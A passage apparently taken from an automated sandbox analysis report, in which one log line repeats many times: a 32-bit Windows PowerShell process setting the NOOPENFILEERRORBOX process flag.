                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
